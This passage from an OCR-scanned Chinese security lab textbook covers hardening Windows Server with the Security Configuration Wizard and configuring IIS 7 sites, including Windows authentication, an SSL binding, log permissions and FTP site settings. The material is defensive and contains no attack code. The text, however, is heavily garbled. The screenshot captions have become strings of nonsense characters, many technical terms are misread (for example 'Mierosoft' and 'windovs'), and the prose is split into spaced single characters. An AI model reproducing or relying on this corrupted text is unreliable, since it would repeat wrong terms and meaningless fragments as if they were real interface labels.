(3) 单 击 【下 一 步 】 按 钮 ， 进 入 【选择 服务 器 】 向 导 页 ， 选 择 一 个 服务 器 作为 安全 
基准 ， 在 此 选择 本 机 ， 如 图 11-8 所 示 。 

(4) 单 击 【下 一 步 】 按 钮 ， 进 入 【选择 服务 器 角色 】 向 导 页 ， 如 图 11-9 所 示 ， 系 统 
会 自动 把 前 面 服务 器 配置 设置 的 服务 角色 选择 上 ， 用 户 可 以 根据 实际 情况 进行 增 减 。 

(5) 单 击 【下 一 步 】 按 钮 ， 进 入 【选择 客户 端 功能 】 向 导 页 ， 如 图 11-10 所 示 ， 系 
统 自 动 把 需要 的 客户 端 功能 选择 上 ， 用 户 可 以 根据 实际 情况 进行 增 减 。 
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ET 和 和 和 和 


选择 服务 器 
您 选择 的 服务 器 的 加 置 将 被 用 来 在 此 安全 第 略 中 作为 基准 。 


省 您 可 以 将 此 第 巾 应 用 到 先 定 的 服务 器 ,或 任何 其 他 
服务 器 (使 用 DNS 名 称 、 NetBI0S 名 称 或 IP 地 址 ) G): 


Js | 唔 wa 


《上 - 步 oj| 下 - 步 o ?| 。 取消 
图 11-8 选择 服务 器 
四 


选择 服务 器 角色 
这 些 服 务 器 角色 用 于 启用 服务 并 打开 庙 口 。 一 个 服务 器 可 以 执行 条 个 角色 。 


查看 WN); [安装 的 角色 时 


Active Directory 证 书 服务 - 证 书 驴 友 机 构 = 
历 >》 ASP. HET 状态 服务 
大 了》 FTP 服务 器 
Fb Internet 打印 
厂 》 Mierosoft iSCSI 发 起 程序 服务 
厂 smtp 陷阱 服 务 器 
历 了 Web 服务 器 
厂 》windovs 事件 收集 器 服务 
厢 》Windows 进程 激活 服务 
厂 》 Windows 运程 管理 rs-Wanagenent) 
万 >》 中间 层 应 用 程序 服务 器 (COW+/DTC) 国 


人 


了 解 有 关 服 务 器 角色 的 更 多 信息。 


《上 - 步 oD[F-*m mn | 
图 11-9 选择 服务 器 角色 
可 


选择 客户 庙 功 能 _ 
fA 这 些 客户 淡 功 能 用 于 启用 服务 。 服务 器 可 以 支持 多 个 客户 滑 


查看 WW [安装 的 功能 到 | 
为 选 定 的 服务 器 选择 要 执行 的 客户 淡 功 能久 ): 
厂 Dws 客户 漠 
隐 》 晶 croseft 网 络 容 户 庙 
厂 》PnP-X IF 总 线 枚 举 器 
SD Vindows Wpaate 

厂 Ys 客户 淡 

克 > 后 各 知 能 传输 服务 BITS) 
中 > 域 成 员 
万》 打印 

厅 》 时 间 同 步 
请 网络 发 现 


习 


Me A) I TE WR 
图 11-10 选择 客户 端 功 能 
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(6) 单 击 【下 一 步 】 按 钮 ， 进 入 【选择 管理 和 其 他 选项 】 向 导 页 ， 如 图 11-11 所 示 ， 

系统 自动 把 需要 的 服务 器 选项 能 选择 上 ， 用 户 可 以 根据 实际 情况 进行 增 减 。 
4 


选择 管理 和 其 他 选项 

这 些 管理 和 其 他 选项 用 于 启用 服务 并 打开 端口 * 读 
查看 W): 安装 的 选项 了 
选择 用 来 管理 先 定 的 服务 器 的 选项 G): 


TD NET Franework 3.0 
厂 》 Internet 连接 共享 [ICS) 

厂 》 JPsee 策略 代理 

厂 》LPR 端口 监视 器 

FF > Microsoft .NET Pranevork NOEN - X32 
阿 》 虽 crosoft 光纤 通道 平台 注册 服务 

厂 》 BPc 定位 器 

厂 》SAN 存储 管理 器 - X32 

厂 》 TPW 基本 服务 

厂 》Yeb 代理 自动 发 现 

厂 》 Web 服务 器 CIS) 的 远程 管理 可 


Rh 


了 解 有 关 管 理 选 项 的 更 多 信息 。 


《< 上 - 步 ol [下 - 步 m 让 取消 | 
图 11-11 选择 管理 和 其 他 选项 


(7) 单 击 【 下 一 步 】 按 钮 ， 进 入 【选择 其 他 服务 】 向 导 页 ， 如 图 11-12 所 示 ， 系 统 
自动 把 需要 的 服务 选项 功能 选择 上 ， 用 户 可 以 根据 实际 情况 进行 增 减 。 


安全 配置 向 导 | 


选择 其 他 服务 
在 处 理 安全 配置 歼 据 库 时 在 选 定 的 服务 器 上 找到 已 安装 的 服务 。 


TD Wware Snapshot Provider 
FT 》 Wware Tools Service 

阿 》 Yiware 升级 助手 

DD Windows Font Cache Service 

SD Windows Presentation Foundation Font Cache 4.0.0.0 


了 解 有 关 攻 外 服务 的 更 多 信息 。 


my | 
图 11-12 选择 其 他 服务 
(8) 单 击 【 下 一 步 】 按 钮 ， 进 入 【确认 服务 更 改 】 向 导 页 ， 如 图 11-13 所 示 ， 可 以 
看 到 此 安全 策略 将 对 所 选 服务 器 上 的 服务 进行 的 所 有 更 改 的 列表 。 该 列表 将 所 选 服务 器 
上 的 服务 的 当前 启动 模式 与 策略 中 定义 的 启动 模式 进行 比较 。 启 动 模式 可 以 是 “禁用 ”、 
“手动 ”或 “自动 ”。 
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车 
确认 服务 更 改 
在 继续 前 ， 请 确认 根据 您 的 角色 和 其 他 功能 选择 所 导致 的 服务 更 改 是 正确 的 。 
查看 w)  [ 刘 玖 的 服务 5 


”应 用 程序 休 给 得 搞 服 务 
Internet 连接 共享 ICS) 


Application Experience 
Application Layer Gate.. 
Application Managenent 。 手动 已 禁用 从 组 策略 安装 应 用 程序 
ASP. WET State Service 手动 自动 ASP. NET 状态 服务 
AudioEndpointBuilder 手动 已 禁用 Windows 音频 
Audiosrv 手动 已 禁用 Windows 音频 


Certificate Propagation 智能 卡 齐 
上 

全 要 灌 消 上 面 的 任何 更 次 , 请 返回 到 前 页 ， 并 更 次“ 使 用 者 ” 栏 中 列 出 的 选择 。 

了 解 有 关 确 认 服 务 更 弛 的 更 多 信息 。 


I 
图 11-13 ”确认 服务 更 改 
(9) 单 击 【 下 一 步 】 按 钮 ， 进 入 【网 络 安全 】 向 导 页 ， 如 图 11-14 所 示 ， 在 安全 配 
置 向 导 (SCW) 的 【网 络 安全 】 部 分 , 可 以 添加 、 删 除 或 编辑 与 具有 高 级 安全 性 的 Windows 
防火 墙 有 关 的 规则 ， 在 此 选择 进入 。 


网 络 安全 
1 per 防火 墙 配 置 规则 ， 此 安全 性 


A 拓 入 本 这 电梯 会 改选 让 的 计划 机 不 能 与 其 他 计算 机 进 


三 跳 过 这 一 部 分 G) 
如 果 您 跳 过 此 部 分 ， 此 安全 第 略 将 不 包含 防火 墙 设置 。 


了 解 有 关 园 络 去 全 和 使 用 SCY 管理 网络 安全 风险 的 详细 信息 。 


《上 - 步 @) 取消 
图 11-14 网 络 安全 向 导 


(10) 单 击 【 下 一 步 】 按 钮 ， 进 入 【网 络 安全 规则 】 向 导 页 ， 如 图 11-15 所 示 ， 使 用 
“视图 ”列表 筛选 所 显示 的 规则 。 通 过 使 用 安全 配置 向 导 (SCW)， 可 以 创建 防火 墙 规则 ， 
以 允许 此 计算 机 向 程序 、 系 统 服务 、 计 算 机 或 用 户 发 送 消息 ， 或 者 从 程序 、 系 统 服 务 、 
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计算 机 或 用 户 接收 消息 。 可 以 创建 防火 墙 规则 ， 对 与 规则 匹配 的 所 有 连接 执行 下 列 三 个 
操作 之 一 : 允许 连接 、 只 允许 使 用 Intermet 协议 安全 (IPSec) 保护 的 连接 或 者 明确 阻止 


3 
网 络 安全 规则 


db Windows 防火 墙 规则 。 启用 了 选 定 的 规 让 


查看 WW): | 所 有 规则 =] 


隐 》@ysystenroot%vmierosoft. net\franeworkb4\v3. O\windows conmunication 
fi deal , -2000 


亡国 | 
了 厢 》 scw 入 站 访问 防火 墙 规则 - 系统 - TCP 

厅 SCY 远程 访问 防火 墙 规则 - 系统 - UDP 

所 多 SCY 远程 访问 防火 墙 规则 一 Seshost - 动态 RPC 

所 》 SCY 远程 访问 防火 墙 规则 一 Scshost - 终结 点 FFC 映射 器 

万 》 sc 运程 访问 防火 墙 规则 一 Svehost - TCP 

厅 了》 Windows Communication Foundation Wet, TCP 侦 听 器 适配器 (TCP-In) J 


添加 0 | [ 纺 旨 四] 3 


了 解 有 关 查 看 和 管理 规 出 和 详细 信息 。 


《上 一步 @) | 下 一 步 0 | 取消 
图 11-15 网络 安全 规则 
(11) 选择 一 条 规则 ， 单 击 【 编 辑 】 按 钮 可 以 对 规则 进行 编辑 ， 比 如 选择 FTP 服务 
器 规则 ， 其 编辑 界面 如 图 11-16 所 示 。 


ETE PETIESL | 
常规 。 | 程序 和 服务 | 协议 和 庙 口 | 作用 域 | 


| 毅 疯 一 
叭 丘 Esmam 


J 。 这 是 一 个 定义 的 规则 ,而且 其 有 些 属性 无 法 修改 wm | 


图 11-16 FTP 服务 器 规则 


(12) 安全 规则 编辑 完成 后 单 击 【 下 一 步 】 按 钮 进入 安全 注册 表 设 置 ， 如 图 11-17 所 
示 ， 可 以 配置 用 于 与 其 他 计算 机 进行 通信 的 协议 和 身份 认证 的 方法 。 

(13) 单 击 【 下 一 步 】 按 钮 进入 各 个 规则 向 导 ， 可 以 按照 默认 规则 进行 配置 ， 最 后 的 
结果 如 图 11-18 所 示 。 
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安全 配置 向 导 医 x 
注册 表 设 置 


ee 
+ 


厂 跳 过 这 一 部 分 6) 
如 果 您 跳 过 这 一 部 分 ， 此 安全 策略 将 不 配置 注册 表 设 置 * 


了 解 有 关注 册 才 设置 的 更 多 信息 。 


《上 -~ 步 @) 取消 


图 11-17 注册 表 设置 向 导 


安全 配置 向 导 划 


注册 表 设 置 摘要 
在 继续 前 ,请 确认 您 的 注册 表 设置 正确 。 


— | 
图 11-18 注册 表 设 置 摘要 


(14) 注册 表 设 置 完成 后 ， 单 击 【 下 一 步 】 按 钮 进入 【系统 审核 策略 】 向 导 页 ， 在 安 
全 配置 向 导 (SCW) 的 【审核 策略 】 部 分 ， 可 以 为 所 选 服务 器 配置 审核 策略 。 安 装 安全 
性 能 高 低 依次 为 【不 审核 六 【审核 成 功 的 操作 】 和 【审核 成 功 和 不 成 功 的 操作 】 ， 如 图 
11-19 所 示 。 

(15) 单 击 【 下 一 步 】 按 钮 进入 【审核 策略 摘要 】 向 导 页 ， 查 看 前 面 的 选项 对 系统 审 
核 策略 的 配置 结果 ， 如 图 11-20 所 示 。 


211 


EEC， 对 
系统 审核 策略 
基于 你 的 审核 对 铺 确 定案 核 第 申 。 


了 解 有 关 审核 莹 上 的 更 多 信息 * 


my | 
图 11-19 系统 审核 策略 


安全 配置 向 导 划 
审核 策略 摘要 
在 继续 前 ， 请 确认 您 的 审核 选择 是 正确 的 。 


vy 旭 庆 SCWAudit. inf 安全 模板 。SCWAudit. inf 设置 系统 访问 列表 GACLS) ， 以 审核 对 文件 


心 一 旦 应 用 这 些 SCWAudit. inf SACL， 将 无 法 使 用 SCY 回 滚 操 作 旺 除 。 
了 解 有 关 确 这 审核 更 履 的 更 多 信息 。 


一 | 
图 11-20 审核 策略 摘要 

(16) 审核 策略 配置 完成 后 ， 安 全 配置 向 导 基 本 结束 ， 接 下 来 用 户 可 以 把 刚才 的 配置 
结果 保存 ， 用 于 日 后 修改 、 检 查 ， 如 图 11-21 所 示 。 

(17) 单 击 【 查 看 安全 策略 】 按 钮 ， 可 以 查看 全 部 的 安全 策略 配置 结果 ， 如 图 11-22 
所 示 。 单 击 【 包 括 安全 模板 】 可 以 在 安全 策略 中 添加 配置 好 的 系统 安全 模板 。 

(18) 查看 保存 完成 后 ， 单 击 【下 一 步 】 按 钮 进入 【正在 应 用 安全 策略 】 向 导 页 ， 如 
图 11-23 所 示 ， 选 择 立 即 应 用 ， 即 可 把 刚才 的 配置 结果 应 用 到 本 机 ， 也 可 以 以 后 应 用 。 
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安全 配置 向 导 BE 


安全 策略 文件 名 
将 使 用 您 提供 的 名 称 和 指 述 保存 安全 第 略 文件 。 读 


安全 第 同文 件 名 如 果 没 有 提供 文件 扩展 名 ， 将 自动 添加 扩展 名 “. xml ) G) 


F Mindows\security\nsscw\Folicies\mypd| 浏览 0 
指 壕 器 选 ) 0)， 
习 
避 


查看 安全 策略 (y) 包括 支 全 模板 x) | 


了 和解 有 关 保存 安全 第 路 的 更 多 信息 。 


图 11-21 保存 安全 配置 文件 


文件 @) 帮助 00 


安全 策略 


此 安全 策略 包含 基于 服务 器 角色 配置 服务 和 网 络 安 全 的 救 据 ， 以 及 配置 注册 素 和 审核 设置 
站 堵 据 。 


: WEBSERVER 


服务 名 称 启动 模式 疾 述 


颁发 、 管 理 和 障 除 此 类 应 用 程序 (如 
Active Directory Certificate Automatic te 如 
Services 最 二 日 扫 上 ， 风 人 人 人 了 地 
的 服务 均 村 无 法 自动 = 


AD DS 域 控制 器 服务 。 如 果 停止 此 服 


Active Directory Domain services ”Disabled 务 ， 村 
都 稳 


AD FS Web Agent Authentication ”Disabled ”AD FS Web 代理 身份 验证 服务 验证 传 


Service 


入 的 令 牌 和 cookie。 


图 11-22 查看 安全 策略 


加 
正在 应 用 安全 策略 
安全 配置 向 导 正 在 将 安全 第 略 应 用 到 选 定 的 服务 器 。 
正在 准备 .. 


cE | 到 菠 
图 11-23 应 用 安全 策略 
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【实验 报告 】 
(1) 叙述 系统 安全 设置 过 程 。 
(2) 利用 安全 扫描 工具 分 别 对 安全 设置 前 和 安全 设置 后 进行 扫描 ， 分 析 扫 描 结果 。 


【思考 题 】 
Windows Server 安全 配置 是 项 非常 复杂 的 工作 ， 请 查阅 资料 服务 器 安全 加 强 还 需要 
做 哪些 工作 。 


11.1.2 ”Web 服务 器 的 设置 


【实验 目的 】 
掌握 删除 默认 站 点 和 建立 新 站 点 的 方法 ， 了 解 一 般 安 全 站 点 的 配置 方法 。 


【原理 简介 】 

Internet Information Services (IIS)7 是 一 种 主流 的 Web 服务 器 , 它 是 一 种 集成 了 IIS、 
ASPNET、Windows Communication Foundation 和 Windows SharePoint Services 的 统一 
Web 平台 。IIS 7 允许 Intemet、Intranet 或 Extranet 上 的 用 户 共享 信息 。 

为 了 增强 安全 性 ， 默 认 情 况 下 Windows Server 2008 上 未 安装 IIS 7。 当 安装 IIS 7 
时 ， 系 统 会 默认 地 将 Web 服务 器 配置 为 只 提供 静态 内 容 。 

下 面 描述 了 IIS 7 中 的 新 增 安 全 功能 ， 并 简要 介绍 了 它们 的 优点 。 

(1) 可 以 将 IP 限制 列表 配置 为 拒绝 单 台 计 算 机 、 一 组 计算 机 、 域 或 所 有 IP 地 址 
和 未 列 出 的 项 访问 内 容 。 这 除了 提供 IIS 6.0 授予 /拒绝 支持 外 ， 还 为 IP 限制 规则 的 继 
承 和 合并 提供 支持 。 

(2) UrlScan 2.5 安全 工具 的 功能 并 入 到 了 IIS 7 中 。 这 样 ， 就 不 再 需要 下 载 单独 的 
玉 其 5 

(3) IIS 7 支持 在 本 机 代码 中 实现 URL 授权 。 为 了 保持 一 致 ， 这 一 更 改 为 现 有 
ASPNET 托管 代码 实现 的 所 有 功能 提供 支持 。 

身份 验证 有 助 于 确认 请 求 访问 站 点 或 应 用 程序 的 客户 端的 标识 。 默 认 情况 下 ，IIS 7 
支持 匿名 身份 验证 和 集成 Windows 身份 验证 。 

IIS 7 支持 基于 质询 和 基于 登录 重 定向 的 身份 验证 方法 。 基 于 质询 的 身份 验证 方法 
(例如 集成 Windows 身份 验证 ) 要 求 客户 端正 确 响应 服务 器 发 出 的 质询 。 基 于 登录 重 定 
向 的 身份 验证 方法 (例如 Forms 身份 验证 ) 依靠 登录 页 重 定向 来 确定 用 户 的 标识 。 用 户 
不 能 同时 使 用 基于 质询 的 身份 验证 方法 和 基于 登录 重 定向 的 身份 验证 方法 。 

此 外 ，IIS 7 还 支持 客户 端 证 书 身份 验证 ， 此 方法 需要 为 站 点 配置 安全 套 接 字 层 

(SSL )。 
用 户 可 以 允许 或 拒绝 特定 计算 机 、 计 算 机 组 或 域 访 问 服务 器 上 的 站 点 、 应 用 程序 、 
目录 或 文件 。 例 如 ， 假 设 用 户 的 Intranet 服务 器 不 仅 承载 只 应 由 特定 组 〈 如 财务 或 人 力 
资源 ) 的 成 员 查 看 的 内 容 ， 还 承载 了 所 有 员工 均 可 访问 的 内 容 。 通 过 配置 URL 授权 规 
则 ， 可 以 防止 不 是 这 些 指定 组 的 成 员 的 员工 访问 受 限 内 容 。 
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【实验 环境 】 
Windows Vista 以 上 操作 系统 ，IIS 7.0。 


【实验 步骤 】 
1. 建立 新 站 点 


(1) 关闭 Web 站 点 : 单 击 【 控 制 面板 】| 【管理 工具 】| 【Intemet 信息 服务 (IIS) 
理 器 】 出 现 管理 界面 如 图 11-24 所 示 。 


管 


me 


CE worksTATION » 网 站 » DefaultWeb Site » | 


@ Default Web Site 


入 远 : 加 | 


ASPJNET 之 
芝 国 上 是 
.NET 蝙 译 ”NET 错误 页 查 
忌 全 多 重新 语 动 
-NET 配置 文 .NET 全 球 化 DP 
件 


本 停止 
蚂 岛 
EE 


浏览 网 站 
围 浏览 "80 (http) 


11-24 删除 默认 的 Web 站 点 


(2) 创建 一 个 新 站 点 : 右 击 机 器 名 称 ， 单 击 【 新 建 】 人 Web 站 点 】 如 图 11-25 所 示 ， 
出 现 新 站 点 创建 向 导 。 


图 11-25 添加 网 站 
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(3) 添加 网 站 的 配置 模板 如 图 11-26 所 示 ， 输 入 网 站 名 称 、 内 容 目 录 、 服 务 器 监听 
端口 , 单 击 [确定 】 即 可 。 可 以 使 用 Microsoft Visual Studio 2010 生成 一 个 默认 的 ASPNET 
网 站 ， 然 后 把 生成 的 默认 网 站 发 布 到 本 地 IIS 里 面 的 WebSitel 站 点 ， 用 于 下 面 的 测试 。 


图 11-26 添加 网 站 
(4) 打开 浏览 器 输入 “localhost” 可 以 打开 本 地 网 站 ， 如 图 11-27 所 示 。 


CG 人 Olocalhost/ 
| 


我 的 AsP.NET 应 用 程序 


欢迎 使 用 ASP.NET! 
车 要 了 解 关 于 ASP.NET 的 详细 信息 ， 请 访问 www.asp.net/cn。 
您 还 可 以 找到 MSDN 上 有 关 ASP.,NET 的 文档 。 


图 11-27 测试 网 站 
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2. 配置 身份 认证 
(1) 单 击 【 控 制 面板 】| 【管理 工具 】|【Internet 服务 管理 器 】〗 出 现 管理 界面 。 单 击 
站 点 的 名 称 ， 从 管理 器 中 间 栏 中 单 击 【身份 验证 】 按 钮 ， 如 图 11-28 所 示 。 


图 ，WORKSTATION ， 网 站 ，WebSitel ， 
文件 (F) 。 视图) ”帮助 (H) 


Websitel 
血 | @ 主页 打开 功能 加 
py (WORi 人 - 前 天 (6G) - 目 Bw 
国 网 站 WebDAV 创 处 理 得 序 辽 。 错误 页 3 ee 
全 Default Web Site ‘a 时 证 
@ Websiei | 0 基本 设置 
模 失 。 ”点 认 文档 。 目录 浏览 查看 应 用 程序 
a 查看 虐 拟 目录 
请 求 RE 运 。 ”日志 多 了 WiR 动 
》 启动 
本 本 及 有 目 | 
2 浏览 网 站 
加 浏览 "80 (http) 
nl" 加 aaa 史记 stm rn 
就 绪 家 


图 11-28 站 点 属性 界面 


(2) 双击 【身份 验证 ]， 出 现 系统 的 身份 验证 配置 信息 ， 如 图 11-29 所 示 。ASPNET 
网 站 默认 启用 Forms 身份 认证 和 匿名 身份 认证 。 
Intemet 


@ ，WORKSTATION ， 网 站 、WebSitel ， 


血 上 急 身份 验证 全 用 

| WORKSTATION (woRkd 

WORKSTATION (WORI Pr 纺 纺 - 
所 应 用 程序 池 | @ xm 

国 网 站 ! 联机 帮助 
b @ Defaukt Web site | | ASP.NET 模拟 已 区 用 


@ websitel Forms 身份 验证 已 启用 


基本 身份 验 汪 忆 本 用 
匿名 身份 验 汪 已 用 
接 要 式 身 份 验证 村 用 
| 
ET 中 国 功 各 图 | 局 内 容 视 图 
配置 : “WebSitel” web.config 旺 


11-29 身份 验证 信息 
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(3) 选中 【Forms 身份 认证 】 单 击 第 三 栏 里 面 的 禁用 ， 可 以 禁用 Forms 身份 认证 ， 
同 理 禁用 匿名 身份 认证 。 然 后 启用 Window 身份 认证 。 配 置 结果 如 图 11-30 所 示 。 单 击 
第 三 栏 中 的 [高 级 设置 按钮 可 以 进行 Windows 身份 认证 的 高 级 设置 ,配置 结果 如 图 11-31 
所 示 。 


4 .- 园 WORKSTATION V 
局 应 用 程序 池 
4 国 网 站 
”多 Defauk We 
» @ Websitel 


| El 一 es 
配置 : applicationHost.config , <location path="WebSitel’> 


(4) 配置 结束 后 ， 右 键 单 击 站 点 ， 单 击 快捷 菜单 中 的 【管理 网 站 】 下 面 的 【重新 启 
动 】 按 钮 ， 重 新 启动 网 站 。 然 后 再 次 在 浏览 器 中 输入 “localhost”， 出 现 如 图 11-32 所 示 
的 界面 ， 需 要 用 户 登 录 才 能 访问 网 站 。 
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BS wore oex) Cems + 
PP 一 


图 11-32 访问 网 站 


3. 创建 SSL 网 站 
(1) 单 击 【 控 制 面板 】| 【管理 工具 】|【Internet 服务 管理 器 ]， 出 现 管理 界面 。 单 击 
站 点 的 名 称 ， 从 管理 器 第 三 栏 中 单 击 【 绑 定 】 按 钮 ， 出 现 如 图 11-33 所 示 界 面 。 


a | 


11-33 ”网 站 绑 定 


(2) 单 击 【 网 站 绑 定 】 中 的 【添加 】 按钮 ， 出 现 【 添 加 网 站 绑 定 】 界 面 ， 如 图 11-34 
所 示 ， 在 【类 型 】 中 选择 https， 如 图 11-35 所 示 。 为 了 简单 ， 在 【SSL 证 书 】 中 选择 IIS 


图 11-34 选择 类 型 
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Express Development Certificate， 使 用 IIS 提供 的 开发 用 证 书 。 单 击 【 查 看 】 可 以 查看 证 
书信 息 ， 如 图 11-36 所 示 。 


证 书信 息 
Ne 


颁发 给 : 。 localhost 
颁发 者 :locslhost 


有 效 期 从 2011/ 6/ 16 到 202 6/ 16 
是 您 有 一 个 与 该 证 书 对 应 的 私 钥 。 


颁发 者 说 明 (8) 


11-36 ”查看 证 书信 息 

(3) 双击 中 间 栏 中 的 【SSL 设置 】 对 站 点 进行 SSL 配置 , 配置 结果 如 图 11-37 所 示 ， 
配置 完成 后 单 击 右 侧 的 【应 用 】 进行 保存 。 

(4) 在 本 机 使 用 浏览 器 访问 网 站 ， 注 意 输入 URL 地 址 为 “https://localhosW”， 这 时 
浏览 器 会 提示 证 书 有 安全 问题 ， 因 为 证 书 不 是 信任 机 构 颁 发 的 ， 如 图 11-38 所 示 。 单 击 
【继续 浏览 此 网 站 】， 可 以 看 到 网 站 内 容 ， 如 图 11-39 所 示 。 

4. 更 改 IIS 日 志文 件 属性 


(1) 单 击 【 控 制 面板 】|【 管 理工 具 】|【Internet 服务 管理 器 〗 双击 站 点 的 名 称 ， 显 
示 管理 界面 。 选 中 【日 志 】 选 项 ， 如 图 11-40 所 示 。 
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b 人 @ Default Web Site 


全 Websitel 


11-37 SSL 设置 


pr 


[< EEC 


@ 此 网 站 的 安全 证 书 有 问题 。 


此 网 站 出 具 的 安全 证 书 不 是 由 受信 任 的 证 书 癸 发 机 构 颁发 的 。 
安全 证 书 问题 可 能 显示 试图 欺 驴 您 或 截获 您 向 服务 器 发 送 的 数据 。 
建议 关闭 此 网 页 并且 不 要 继续 浏览 该 网 站 . 

和 单 击 此 处 关闭 该 网 页 . 

入 继续 浏览 此 网 站 (不 推荐 ). 

图 详细 信息 


生命 )F 


我 的 AsP.NET 应 用 程序 


欢迎 使 用 ASP.NET! 
若 要 了 解 关于 ASPJNET 的 详细 信息 ,请 访问 www.asp.net/cn。 
您 还 可 以 找到 MSDN 上 有 关 ASP.NET 的 文档 。 
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， WORKSTATION ， 网 站 ， WebSitel ， wu 


@ Websitel 主页 
第 远 : 


二 ”图 


连接 字符 过 ”页面 和 控件 


应 用 程序 设 
十 


运行 可 和 涌 疡 
lS 
日 志 | 失 风 请 冰 跟 
内 容 视图 


加 zi | 司 


国 浏览 "80 (http) 
“443 (https) 


图 11-40 Internet 服务 管理 器 


(2) 双击 中 间 栏 中 的 【日 志 】 可 以 查看 日 志 设置 ， 如 图 11-41 所 示 。 用 户 在 【格式 】 
选择 列表 中 选择 日 志 格式 ， 可 以 单 击 【 选 择 字段 】 选 择 记 录 日 志 的 内 容 ， 如 图 11-42 所 


示 。 在 这 个 界面 中 可 以 选择 日 志 的 保存 地 址 ， 为 了 提高 安全 性 ， 建 议 选择 一 个 新 的 目录 存 


放 IIS 日 志 ， 并 且 该 目录 的 权限 只 赋予 系统 管理 员 ， 其 他 用 户 没有 任何 权限 。 


11-41 日 志 设置 


IIS 日 志 为 文本 文件 ， 可 以 双击 打开 查看 ， 也 可 以 下 载 IIS 日 志 分 析 工 具 进 行 分 析 。 
【实验 报告 】 
叙述 Web 站 点 设置 过 程 。 
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日 期 ( date ) 

时 间 ( time ) 

客户 庄 Ip 地 址 ( c-ip ) 

用 户 名 ( cs-username ) 

服务 名 称 ( s-sitename ) 

加 服务 矢 名 称 ( s-computername ) 
| 服务 器 IP 地 址 ( s-ip ) 


URI 资源 ( cs-uri-stem ) 

URI 查询 ( cs-uri-query ) 
协议 状态 ( sc-status ) 
协议 子 状态 ( sc-substatus ) 
Win32 状态 ( sc-win32-status ) 


所 用 时 间 ( time-taken ) 

加 协议 版 本 ( cs-version ) 

回 主 th cs-host) 

| 用 户 代理 ( cs(User-Agent) ) 
| Cookie ( cs(Cookie) ) 

回 引用 网 站 ( cs(Referen ) 


图 11-42 日 志 记 录 格式 


【思考 题 】 

(1) 如 何 监测 和 防止 Web 服务 器 主页 被 非法 修改 ? 

(2) 在 DD 盘 下 建立 一 个 日 志文 件 夹 ， 用 于 存放 日 志文 件 ， 并 且 按 照 要 求 设置 文件 夹 
的 权限 为 只 有 管理 员 和 系统 账号 才能 进行 完全 控制 ， 其 他 用 户 组 没有 权限 。 


11.1.3 FTP 服务 器 的 安全 配置 


【实验 目的 】 
掌握 FTP 站 点 安全 属性 设置 方法 ， 了 解 站 点 属性 的 具体 内 涵 。 


【原理 简介 】 

通过 使 用 Internet 服务 管理 器 可 以 像 HS 一 样 管理 和 配置 FTP 服务 ,使 用 它 可 以 分 开 
控制 单独 的 FTP 站 点 。 配 置 FTP 站 点 属性 可 以 分 为 三 级 : 主 站 点 级 (Master)、 站 点 级 
(CSite) 以 及 虚拟 目录 级 〈Virtual Directory)。 主 站 点 级 上 的 设置 会 被 站 点 上 所 有 新 建 的 
FTP 站 点 所 继承 。 

对 FTP 安全 配置 的 措施 主要 包括 : 用 户 账号 认证 、 匿 名 访问 控制 以 及 IP 地 址 限制 ， 
有 些 内 容 和 IIS 安全 配置 一 致 。 为 了 安全 ， 一 定 不 要 把 FTP 根 文件 夹 与 IIS 服务 器 设置 
在 同一 个 磁盘 卷 上 。 选 定 目 录 后 ， 就 可 以 在 目录 上 设置 读 取 或 写 入 的 权限 。 可 读 权限 用 
于 下 载 文 件 ， 可 写 权限 用 于 上 传 文件 。 一 般 地 ， 对 于 可 写 的 FTP 站 点 不 应 该 授予 用 户 读 
取 的 权限 ， 因 为 如 果 同 时 对 匿名 用 户 在 相同 的 目录 下 授予 了 读 和 写 的 权限 ， 会 让 FTP 服 
务 器 成 为 中 转 站 ， 引 起 不 必要 的 麻烦 。 所 以 应 当 仅 让 具有 适当 权限 的 内 部 用 户 对 上 传 的 
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文件 有 读 取 的 权限 。 


【实验 环境 】 
Windows 7 操作 系统 ，IIS 7.0。 


【实验 步骤 】 

FTP 站 点 安全 属性 设置 

(1) 单 击 【 控 制 面板 】| 【管理 工具 】|【Internet 服务 管理 器 〗 出 现 管理 界面 。 右 击 
机 器 名 称 ， 然 后 从 弹出 菜单 中 选择 【添加 FTP 站 点 】 菜单， 显示 如 图 11-43 所 示 的 界面 。 


ox 


服务 (HS) 管 


上司 WORKSTATION ， ww 


打开 功能 
管理 服务 器 
人 本 新 启动 
》 启动 
加 停止 
查看 应 用 程序 池 
查看 网 站 
部 下 @ 
明 导 H 服 务 各 所 .… 
获 导入 服务 器 包 或 站 点 但 _ 
更 改 .NET Framework 敌 本 
@ eu 
联机 帮助 


图 11-43 添加 FTP 站 点 
(2) 在 【站 点 信息 】 页 面 ， 分 别 填写 站 点 名 称 和 内 容 目 录 ， 如 图 11-44 所 示 。 


i a ) 


[sh FP: 5 | x 
[tale 本 


图 11-44 填写 站 点 信息 
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(3) 单 击 【下 一 步 】 按 钮 进入 【 绑 定 和 SSL 设置 】 界 面 ， 配 置 选 项 如 图 11-45 所 示 。 


2 | 


了 p 地 址 (A): 鞠 口 OQ): 
全 部 未 分 配 
启用 虚拟 主机 名 (E): 

虚拟 主机 ( 示 鲍 : ftp.contoso.com)(V): 


图 11-45 绑 定 和 SSL 设置 


(4) 单 击 【 下 一 步 】 按 钮 进入 身份 验证 和 授权 信息 界面 ， 如 果 配 置 一 个 允许 匿名 只 
读 访 问 的 FTP 站 点 ， 配 置 选项 如 图 11-46 所 示 。 


ese | 一 > | Bsn) (mses) 


图 11-46 身份 验证 和 授权 信息 
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(5) 配置 完成 后 的 界面 如 图 11-47 所 示 ， 单 击 右 侧 栏 中 的 【启动 】 选 项 ， 如 果 系 统 
的 Microsoft FTP Service 没有 启动 ， 则 会 出 现 错 误 ， 如 图 11-48 所 示 ， 这 时 可 以 从 系统 服 
务 配 置 中 找到 Microsoft FTP Service， 双 击 启动 即 可 ， 如 图 11-49 所 示 ， 然 后 再 启动 FTP 


WORKSTATION (WORKS 


辐 应 用 程序 池 
国 网 站 
» @ Default Web Sie 


mip 
» @ websitel 


Fip mR 


a 至 目 


【9 
FTP IPv4 地 FTP SSL 设 FTP 当前 会 
址 和 域 限制 本 话 
a 
Sis 


FTP 防火 墙 FTP 目录 浏 ”FTP 请 求 篇 
支持 贤 运 


和 


FP 日志。 FTP 身份 恰 ”FTP 授权 规 |。 


功能 视图 | 居 内 容 栅 图 


除非 Microsoft FTP 服务 (FTPSVC) 正 在 运行 ， 否则 无 法 启动 FTP 站 
点 。 服 务 目 前 已 停止 . 


冶 Microsof .NET Framework NG-，Micr- 
多 Microsof .NET Framework NG.. Micr.. 


遍 MicrosoftisCsI Initiator Service ”管理 
痪 Microsoft Software Shadow Co 管理 


